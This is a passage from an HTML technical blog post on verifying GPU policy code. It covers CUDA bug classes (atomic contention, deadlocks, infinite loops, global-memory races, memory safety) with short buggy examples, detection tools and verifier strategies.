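  policy_write&amp;lt;&amp;lt;&amp;lt;(n + 255) / 256, 256, 0, stream&amp;gt;&amp;gt;&amp;gt;(d_buf, n);
  cudaMemcpyAsync(h_buf, d_buf, n * sizeof(int), cudaMemcpyDeviceToHost, stream);

  // Contract: the host may consume h_buf only after this sync point.
  cudaError_t err = cudaStreamSynchronize(stream);
  if (err != cudaSuccess) {
    fprintf(stderr, "sync failed: %s\n", cudaGetErrorString(err));
    return 1;
  }
  printf("h_buf[%d] = %d\n", n - 1, h_buf[n - 1]);

  cudaFreeHost(h_buf);
  cudaFree(d_buf);
  cudaStreamDestroy(stream);
  return 0;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Deleting the &lt;code&gt;cudaStreamSynchronize&lt;/code&gt; call turns this into the kind of host-device race that a CuSan-style detector is meant to report.&lt;/p&gt;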

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Host+Device/System (H), Dynamic-only. These races involve host-side API calls (cudaMemcpy, kernel launch, synchronization) interacting with device execution: the policy verifier provides no soundness guarantees for this bug class (host API ordering is out of scope); completeness is N/A as this is fundamentally a host-side problem.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: The policy verifier cannot provide guarantees for this bug class. It can only ensure policy code doesn't introduce &lt;em&gt;additional&lt;/em&gt; async semantics (e.g., policy writes are only visible after guaranteed sync points). Define strict lifetime &amp;amp; ordering contracts for policy-accessible buffers.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: CuSan is the primary tool: an open-source detector for "data races between (asynchronous) CUDA calls and the host," using Clang/LLVM instrumentation plus ThreadSanitizer. Integrate CuSan into CI for host-side integration tests of the runtime/loader.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Dynamic detection covers only the paths that tests actually execute, so its strength depends on test coverage. For production, implement runtime checks in the loader/driver for obvious violations (e.g., policy accessing freed memory, missing sync before host read). This is the H-track core tool requirement.&lt;/p&gt;




&lt;h3&gt;
  
  
  14) Atomic Contention [Performance, GPU-amplified]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Heavy atomic contention is a classic "performance bug that behaves like a DoS" under massive parallelism. Even when correctness is preserved, contention on a single address can cause extreme slowdowns (orders of magnitude). With millions of threads, a single hot atomic can serialize execution and cause tail latency explosion.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;counter&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="c1"&gt;// All threads atomically increment the same location =&amp;gt; extreme contention&lt;/span&gt;
  &lt;span class="n"&gt;atomicAdd&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;counter&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="c1"&gt;// Called with &amp;lt;&amp;lt;&amp;lt;1000, 1024&amp;gt;&amp;gt;&amp;gt; =&amp;gt; 1M threads contending on one address&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;GPUAtomicContention: an open-source benchmark suite (2025) explicitly measuring atomic performance under contention and across different &lt;strong&gt;memory scopes&lt;/strong&gt; (block/device/system) and access patterns.(&lt;a href="https://github.com/KIT-OSGroup/GPUAtomicContention" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Budget-based verification:&lt;/strong&gt; limit atomic frequency per warp/block.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Benchmarking:&lt;/strong&gt; use atomic contention benchmarks to calibrate safe budgets.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Static analysis:&lt;/strong&gt; identify hot atomic targets and warn about contention risk.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;Treat "atomic frequency + contention risk" as a verifier-enforced budget: e.g., allow at most one global atomic per warp, or require warp-aggregated updates. For evaluation, you can reuse the open benchmark suite to calibrate "safe budgets" per GPU generation. Consider requiring warp-level reduction before global atomics to reduce contention by 32x.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Combined → Extension-local (C→E) via budgetization, Static-sound. Contention severity depends on both policy behavior (atomic frequency) and kernel behavior (concurrent atomics to same address), but this reduces to Extension-local by treating atomics as a budget, providing strong soundness for policy's contribution with medium completeness (high-throughput atomic patterns hit budget limits).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: The verifier treats "atomic frequency + contention risk" as a budget: (1) limit to N global atomics per warp per invocation; (2) require warp-aggregation (one atomic per warp instead of per-lane), which reduces atomic traffic by up to 32x by construction; (3) forbid unbounded atomic loops. The budget provides bounded-overhead guarantees for policy's contribution regardless of kernel behavior.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: GPUAtomicContention is an open-source benchmark suite (2025) explicitly measuring atomic performance under contention across different memory scopes (block/device/system) and access patterns: use it to calibrate "safe budgets" per GPU generation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Total system contention depends on concurrent workloads: the verifier bounds &lt;em&gt;policy's contribution&lt;/em&gt;, not system-wide slowdown. "Making Powerful Enemies on NVIDIA GPUs" demonstrates adversarial kernels can systematically amplify interference through shared resource contention, making tight system-wide bounds impossible to guarantee statically.&lt;/p&gt;




&lt;h3&gt;
  
  
  15) Non-Barrier Deadlocks [Safety, GPU-amplified]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Besides barrier divergence (which is specifically about &lt;code&gt;__syncthreads&lt;/code&gt; under divergent control flow), SIMT lockstep can create deadlocks in other patterns that are unusual on CPUs: spin-waiting, lock contention within a warp, and named-barrier misuse. Warp-specialized kernels often use &lt;strong&gt;named barriers&lt;/strong&gt; or structured synchronization patterns between warps/roles (producer/consumer). Bugs include: (a) spin deadlock due to missing signals, (b) unsafe barrier reuse ("recycling") across iterations, (c) races between producers/consumers.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example (spin deadlock)
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;flag&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="c1"&gt;// Block 0 expects Block 1 to set flag, but no global sync exists&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;blockIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;atomicAdd&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;flag&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;  &lt;span class="c1"&gt;// may spin forever&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;blockIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;42&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="cm"&gt;/* forgot to set flag */&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Bug example (named-barrier misuse, sketch)
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Producer writes buffer then signals barrier B&lt;/span&gt;
&lt;span class="c1"&gt;// Consumer waits on B then reads buffer&lt;/span&gt;
&lt;span class="c1"&gt;// Bug: consumer waits on wrong barrier instance / reused incorrectly in loop&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;iGUARD notes that lockstep execution can deadlock if threads within a warp use distinct locks.(&lt;a href="https://akkamath.github.io/files/SOSP21_iGUARD.pdf" rel="noopener noreferrer"&gt;Aditya K Kamath&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;GKLEE reports finding deadlocks via symbolic exploration of GPU kernels.(&lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;Lingming Zhang&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;ESBMC-GPU models and checks deadlock too.(&lt;a href="https://github.com/ssvlab/esbmc-gpu" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;WEFT verifies &lt;strong&gt;deadlock freedom&lt;/strong&gt;, &lt;strong&gt;safe barrier recycling&lt;/strong&gt;, and &lt;strong&gt;race freedom&lt;/strong&gt; for producer-consumer synchronization (named barriers).(&lt;a href="https://zhangyuqun.github.io/publications/ase2019.pdf" rel="noopener noreferrer"&gt;zhangyuqun.github.io&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Protocol verification (WEFT-style):&lt;/strong&gt; for specific synchronization patterns, prove deadlock freedom + race freedom + safe reuse. Model barrier instances across loop iterations and prove safe reuse.(&lt;a href="https://zhangyuqun.github.io/publications/ase2019.pdf" rel="noopener noreferrer"&gt;zhangyuqun.github.io&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Symbolic exploration (GKLEE-style):&lt;/strong&gt; explore possible interleavings and detect deadlock states.(&lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;Lingming Zhang&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;Ban blocking primitives in policy code (locks, spin loops, waiting on global conditions). Add a verifier rule: &lt;strong&gt;no unbounded loops / no "wait until" patterns&lt;/strong&gt;. If you absolutely need synchronization, force "single-lane, nonblocking" patterns and bounded retries. Policies must not interact with named barriers (no waits, no signals). This aligns with the availability story: policies must not create device stalls.&lt;/p&gt;
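
&lt;p&gt;One way to picture a "single-lane, nonblocking" pattern with bounded retries is the sketch below. All names (&lt;code&gt;bounded_saturating_add&lt;/code&gt;, &lt;code&gt;kMaxRetries&lt;/code&gt;, &lt;code&gt;k_policy&lt;/code&gt;) and the retry budget are hypothetical, and the sketch assumes 1D thread blocks with a warp size of 32. The update uses a compare-and-swap loop with a fixed iteration bound, so a thread that keeps losing the race gives up instead of spinning.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;constexpr int kMaxRetries = 4;  // hypothetical retry budget

// Returns true if the update landed within the budget, false if the caller gave up.
__device__ bool bounded_saturating_add(int* addr, int delta, int cap) {
  int observed = *addr;  // initial guess; the CAS below validates it
  for (int attempt = 0; attempt &amp;lt; kMaxRetries; ++attempt) {
    int desired = min(observed + delta, cap);
    int previous = atomicCAS(addr, observed, desired);
    if (previous == observed) return true;  // our CAS won
    observed = previous;                    // lost the race: retry with the fresh value
  }
  return false;  // budget exhausted: drop the update rather than stall the warp
}

__global__ void k_policy(int* stat) {
  // Single-lane pattern: only lane 0 of each warp touches the shared word.
  if ((threadIdx.x &amp;amp; 31) == 0) {
    (void)bounded_saturating_add(stat, 1, 1 &amp;lt;&amp;lt; 20);
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Because the loop bound is a compile-time constant and no thread waits on another thread's progress, a verifier can accept this shape while still rejecting open-ended "wait until" loops.&lt;/p&gt;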

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E), By-construction. Deadlock patterns (spin-wait, lock contention, named-barrier misuse) are structural properties of policy code; banning blocking primitives makes deadlocks structurally impossible with perfect soundness and high completeness (blocking patterns are rarely needed in policy code).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: The verifier bans: (1) &lt;code&gt;while(condition)&lt;/code&gt; loops that could spin indefinitely; (2) lock primitives and mutex-like patterns; (3) named-barrier operations (waits, signals); (4) waiting on global conditions; (5) any construct that could block warp/block execution. If synchronization is needed, force "single-lane, nonblocking" patterns with bounded retries.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: ESBMC-GPU models and checks deadlock via bounded model checking; WEFT verifies deadlock freedom, safe barrier recycling, and race freedom for producer-consumer synchronization with named barriers; GKLEE reports finding deadlocks via symbolic exploration. iGUARD notes that lockstep execution can deadlock if threads within a warp use distinct locks.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Policies with legitimate bounded-retry patterns must be structured with explicit iteration counts to prove termination. iGUARD notes that Independent Thread Scheduling (ITS) breaks warp-lockstep assumptions: threads in the same warp can now deadlock on locks if they take different branches. Banning blocking primitives is the only sound approach without complex ITS-aware analysis.&lt;/p&gt;




&lt;h3&gt;
  
  
  16) Kernel Non-Termination / Infinite Loops [Safety, GPU-amplified]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Infinite loops can hang GPU execution. In practice, non-termination is especially dangerous because GPU preemption/recovery can be coarse.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;flag&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;flag&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;  &lt;span class="c1"&gt;// infinite loop if flag never set&lt;/span&gt;
  &lt;span class="c1"&gt;// or: while (true) { /* missing break */ }&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;CL-Vis explicitly calls out infinite loops (together with barrier divergence) as GPU-specific bug types to detect/handle.(&lt;a href="https://cai.type.sk/content/2019/1/cl-vis-visualization-platform-for-understanding-and-checking-the-opencl-programs/4318.pdf" rel="noopener noreferrer"&gt;Computing and Informatics&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Static bounds analysis:&lt;/strong&gt; prove loop termination or enforce compile-time bounded loops.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Runtime watchdog:&lt;/strong&gt; timeout-based detection (coarse but practical).&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;This is where "bounded overhead = correctness" is easiest to justify: enforce a &lt;strong&gt;strict instruction/iteration bound&lt;/strong&gt; for policy code (like eBPF on CPU). If policies may contain loops, require compile-time bounded loops only, with conservative upper bounds.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E) for policy code, Static-sound; kernel non-termination is out of scope. Bounded loops or an instruction budget guarantee policy termination with strong soundness but low completeness (loops with data-dependent bounds are rejected even if they always terminate).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: The eBPF approach works: (1) all loops must have compile-time bounded iteration counts; OR (2) ban loops entirely; OR (3) enforce a total instruction budget. The verifier proves termination by construction without analyzing the kernel. Policies may contain loops only if bounds can be statically determined.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: ESBMC-GPU can find non-termination paths within context bounds; CL-Vis explicitly calls out infinite loops (together with barrier divergence) as GPU-specific bug types to detect; runtime watchdogs provide coarse timeout-based detection (engineering stopgap, not completeness).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: The verifier guarantees &lt;em&gt;policy&lt;/em&gt; termination, not &lt;em&gt;kernel&lt;/em&gt; termination. If the kernel itself has infinite loops, the policy verifier cannot and should not try to detect this; that's a kernel bug requiring kernel-level tools. This is "bounded overhead = correctness" at its most justified.&lt;/p&gt;




&lt;h3&gt;
  
  
  17) Global-Memory Data Races [Correctness, CPU-shared]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Races on global memory are a fundamental correctness issue. Unlike shared memory (block-local), global memory is accessible by all threads across all blocks, making races harder to reason about. Many GPU race detectors historically focused on shared memory and ignored global-memory races.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;g&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;blockIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;blockDim&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="c1"&gt;// Multiple threads may write to same location without sync&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;g&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// race if multiple threads hit same index&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;ScoRD explicitly argues that many GPU race detectors focus on shared memory and ignore global-memory races.(&lt;a href="https://www.csa.iisc.ac.in/~arkapravab/papers/isca20_ScoRD.pdf" rel="noopener noreferrer"&gt;CSA - IISc Bangalore&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;iGUARD targets races in global memory introduced by advanced CUDA features.(&lt;a href="https://akkamath.github.io/files/SOSP21_iGUARD.pdf" rel="noopener noreferrer"&gt;Aditya K Kamath&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;GKLEE reports global memory races via symbolic exploration.(&lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;Lingming Zhang&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Static verification:&lt;/strong&gt; extend race-freedom proofs to global memory accesses.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dynamic detection:&lt;/strong&gt; instrument global memory accesses and track conflicting pairs.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;If policies can write to global memory (maps, counters, logs), require either: (1) warp-uniform single-writer rules, (2) atomic-only helpers, or (3) per-thread/per-warp sharding. Ban unprotected global writes from policies.&lt;/p&gt;
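
&lt;p&gt;Two of these patterns can be sketched as small device helpers. The helper names (&lt;code&gt;bucket_inc&lt;/code&gt;, &lt;code&gt;shard_add&lt;/code&gt;), the kernel &lt;code&gt;k_fixed&lt;/code&gt;, and the buffer layout are hypothetical. The sharding helper assumes a 1D launch whose block size is a multiple of the warp size, and a &lt;code&gt;shards&lt;/code&gt; array with one slot per warp in the grid.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;// Pattern (2): atomic-only helper. Race-free even when many threads hit one bucket.
__device__ void bucket_inc(int* buckets, int idx) {
  atomicAdd(&amp;amp;buckets[idx], 1);
}

// Pattern (3): per-warp sharding. Each warp owns one slot, written by a single lane.
// Assumes blockDim.x is a multiple of warpSize so that warp ids are unique.
__device__ void shard_add(int* shards, int value) {
  int global_tid = blockIdx.x * blockDim.x + threadIdx.x;
  int warp_id = global_tid / warpSize;
  if (threadIdx.x % warpSize == 0) {
    shards[warp_id] += value;  // no other thread writes this slot
  }
}

__global__ void k_fixed(int* g, int* shards, int n) {
  int tid = blockIdx.x * blockDim.x + threadIdx.x;
  if (tid &amp;lt; n) bucket_inc(g, tid % 16);  // replaces the racy g[tid % 16] += 1
  shard_add(shards, 1);
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The atomic helper trades contention for simplicity, while sharding avoids atomics entirely at the cost of a later reduction over the shards; which one fits depends on how often the policy writes.&lt;/p&gt;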

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Combined → Extension-local (C→E) via state isolation, Static-sound. If policies can write arbitrary kernel global memory, race analysis requires knowing kernel access patterns (Combined). However, restricting policies to write only policy-owned objects reduces this to Extension-local, providing strong soundness with isolation, low completeness for kernel-modifying policies (direct kernel writes require Combined analysis).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: Restricting policies to write only policy-owned objects (maps, ringbuffers) enables Extension-local verification: (1) policy-owned objects use known-safe access patterns (atomics, per-warp sharding); (2) the verifier guarantees race-freedom for policy state without inspecting the kernel; (3) ban unprotected global writes from policies. Three safe patterns: warp-uniform single-writer rules, atomic-only helpers, or per-thread/per-warp sharding.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: ScoRD explicitly argues that many GPU race detectors focus on shared memory and ignore global-memory races, and provides detection with scope awareness; iGUARD targets races in global memory introduced by advanced CUDA features via NVBit instrumentation; GKLEE reports global memory races via symbolic exploration. Note: Compute Sanitizer &lt;code&gt;racecheck&lt;/code&gt; is primarily a shared-memory hazard detector; do not expect it to fully cover global races.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Policies needing to modify kernel data structures directly cannot be verified locally; this capability should be restricted or require explicit kernel-side contracts. ScoRD/iGUARD emphasize global-memory races are underdetected by existing tools; state isolation sidesteps this entirely for policy code.&lt;/p&gt;




&lt;h3&gt;
  
  
  18) Memory Safety (Out-of-Bounds / Misaligned / Use-After-Free / Use-After-Scope / Uninitialized) [Safety, CPU-shared]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Classic memory safety includes both &lt;strong&gt;spatial&lt;/strong&gt; (OOB, misaligned) and &lt;strong&gt;temporal&lt;/strong&gt; (UAF, UAS) violations. Temporal bugs exist on GPUs too: pointers can outlive allocations (host frees while kernel still uses, device-side stack frame returns, etc.).&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example (OOB)
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;float&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
